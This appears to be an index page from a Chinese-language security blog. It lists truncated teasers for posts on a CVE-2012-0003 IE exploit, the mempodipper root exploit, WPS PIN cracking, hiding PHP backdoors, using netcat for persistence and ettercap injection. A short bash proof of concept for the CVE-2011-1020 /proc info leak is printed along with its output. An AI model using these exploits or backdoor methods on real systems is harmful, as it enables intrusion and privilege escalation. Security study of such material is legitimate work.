2012年第一个网马 。。  目标系统：  IE6 IE7 IE8 for   WINDOWS XP3 ，CVE-2012-0003

Exploit :  http://www.dis9.com/code/CVE-2012-0003.html

(更多…)

感谢徒儿Ps7isy 投递

The procedure of breaking through the PIN authentication for WPS wireless routers is quite sufficiently documented and we are on this issue mentioned . It may be simple but the problem with the identification of wifi networks that have enabled WPS. Tested one by one is not very effective and time-consuming, and so it wants for this activity something automated. Below is a brief guide on how to make this painless.

(更多…)

Tool description as appears on the author website :

Unix-privesc-checker is a script that runs on Unix systems ( teste on Solaris 9 ,HPUX 11 ,Various Linux es ,FreeBS D 6.2). It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps (e.g. datebases ) .

it is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred ,compiled and installed ). it can run either as a normal user or as root ( obviously it does a better job when running as root because it can read more files ).

Get here :

http://115.com/file/c2bhal4l

Update:由于服务器续费受到压力（赞助商的鄙视），被迫关闭
很无耻的吧他模板的Powered by discuz! 删除了 =。=  不晓得为什么，看到这个真的很不爽。。。。

好吧，这是一个专注LINUX安全的论坛,发这个帖子的目的，就是问问大家有兴趣嘛？ 小站以后很少会更新

http://www.dis9.com/linux/index.php 目的： 主要是想搭建一个讨论社区，大家在学习中遇到的困难可以在论坛提问板块提问（RFID，BT,无线,Tools,WEB SERVER，服务器维护 其他LINUX发行版），寻求答案

如何隐藏你的PHP后门？前面BRK介绍了With Htaccess  和  The HookWorm 两个隐藏PHP后门的方式，同学们似乎很喜欢这个，看到很多留言

今天我再介绍3种隐藏PHP后门的方式，不过效果都没Brk炊少大黑客介绍的好（The HookWorm ）

如果你有号的方法，如果你想分享，请留言

(更多…)

code  : http://www.dis9.com/code/mempodipper-CVE-2012-0056.c.html

//2.6.32-27-generic UBUNTU   测试代码有木有？ CVE-2011-1020

#!/bin/bash
(sleep 3; echo 15) > /proc/$$/oom_adj &
exec /usr/bin/passwd

输出：

Read 69 bytes:
7 0xffffffff 0xbff646ac 0x0 0x0 0xf4d 0xbff646c8 0xbff64654 0x64b422
Changing password for test.
(current) UNIX password: Read 69 bytes:
3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422
Read 69 bytes:
3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422

(更多…)

I wanted to make this post to save time and headaches for people who own ‘weaponized’ Nokia N900s.

If you regularly update your Nokia N900 by doing (as root):

apt-get update && apt-get upgrade -y

I have ran into some issues with some of the newer packages.

Firstly, the newest beta version of nmap (5.59BETA1_armel) appears to be buggy enough to the point where it’s almost unusable.

(更多…)

g0tmilk视频中的一点东西，跟大家分享一下，小菜文章，大牛勿喷！

PS:在dis9.com发文章感到压力越来越大，阿弥陀佛，别喷我啊~

本菜已经通过九区最新的ping溢出，获得了一台机器的系统权限，我们来安装NC，方便下次DIR溢出，嗯！
(更多…)

这个模块和carlos_perez同学写的psexec_scanner.rb 差不多，你可以点这里查看

现在介绍这个PERL脚本也是扫描整段网络的 spl0it同学写的
(更多…)

ettercap是LINUX下一个强大的欺骗工具，当然WINDOWS也能用，你能够用飞一般的速度创建和发送伪造的包.让你发送从网络适配器到应用软件各种级别的包.绑定监听数据到一个本地端口:从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础模式里才能用)
下面我们来说说咋吧数据插进去
首先你得有自己个规则，默认的ETTERCAP自带了几个

brk@Dis9Team:/usr/share/ettercap$ ls
ettercap.png  etterfilter.cnt        etterfilter.tbl   etter.mime
etter.dns     etter.filter.examples  etter.finger.mac  etter.services
etter.fields  etter.filter.kill      etter.finger.os   etter.ssl.crt
etter.filter  etter.filter.ssh       etterlog.dtd
brk@Dis9Team:/usr/share/ettercap$

(更多…)